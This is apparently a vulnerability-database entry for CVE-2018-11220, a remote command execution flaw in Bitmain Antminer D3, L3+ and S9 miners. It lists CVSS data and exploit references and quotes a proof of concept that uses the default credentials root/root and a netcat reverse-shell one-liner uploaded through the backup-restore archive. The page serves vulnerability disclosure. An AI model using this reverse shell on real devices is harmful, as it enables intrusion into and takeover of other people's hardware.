Vulnerabilities > CVE-2018-11220 - Unspecified vulnerability in Bitmain products

047910
CVSS 8.8 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
LOW
Confidentiality impact
HIGH
Integrity impact
HIGH
Availability impact
HIGH
network
low complexity
bitmain
exploit available

Summary

Bitmain Antminer D3, L3+, and S9 devices allow Remote Command Execution via the system restore function.

Exploit-Db

descriptionBitmain Antminer D3/L3+/S9 - Remote Command Execution. CVE-2018-11220. Remote exploit for Hardware platform
fileexploits/hardware/remote/44779.txt
idEDB-ID:44779
last seen2018-05-28
modified2018-05-27
platformhardware
port
published2018-05-27
reporterExploit-DB
sourcehttps://www.exploit-db.com/download/44779/
titleBitmain Antminer D3/L3+/S9 - Remote Command Execution
typeremote

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/147950/bitmainantminer-exec.txt
idPACKETSTORM:147950
last seen2018-05-31
published2018-05-27
reporterCorrado Liotta
sourcehttps://packetstormsecurity.com/files/147950/Bitmain-Antminer-D3-L3-S9-Remote-Command-Execution.html
titleBitmain Antminer D3/L3+/S9 Remote Command Execution

Seebug

bulletinFamilyexploit
description* Exploit Title: Bitmain Antminer D3, L3+, and S9 devices allow Remote Command Execution * Google Dork: N/A * Date: 27/05/2018 * Exploit Author: Corrado Liotta * Vendor Homepage: https://www.bitmain.com/ * Software Link: N/A * Version: Antminer - D3, L3+, S9, and other * Tested on: Windows/Linux * CVE : CVE-2018-11220 ### Description The software used by the miners produced by the bitmain (AntMiner) is affected by a vulnerability of remote code execution type, it is possible through the "Retore Backup" functionality of the administration portal to execute commands on the system. This would allow a malicious user with valid credentials to access the entire file system with administrative privileges. ### POC Login on Antminer Configuration Portal (Default Credential: root/root) 1) Create a file named: restoreConfig.sh 2) insert inside: ``` rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc your_ip your_port >/tmp/f ``` 3) Generate archive by inserting the file created before: Exploit.tar 4) Launch net cat and upload file: ``` nc -vv -l -p port ``` system --> upgrade --> upload archive
idSSV:97314
last seen2018-06-26
modified2018-05-28
published2018-05-28
reporterMy Seebug
titleBitmain Antminer D3/L3+/S9 - Remote Command Execution(CVE-2018-11220)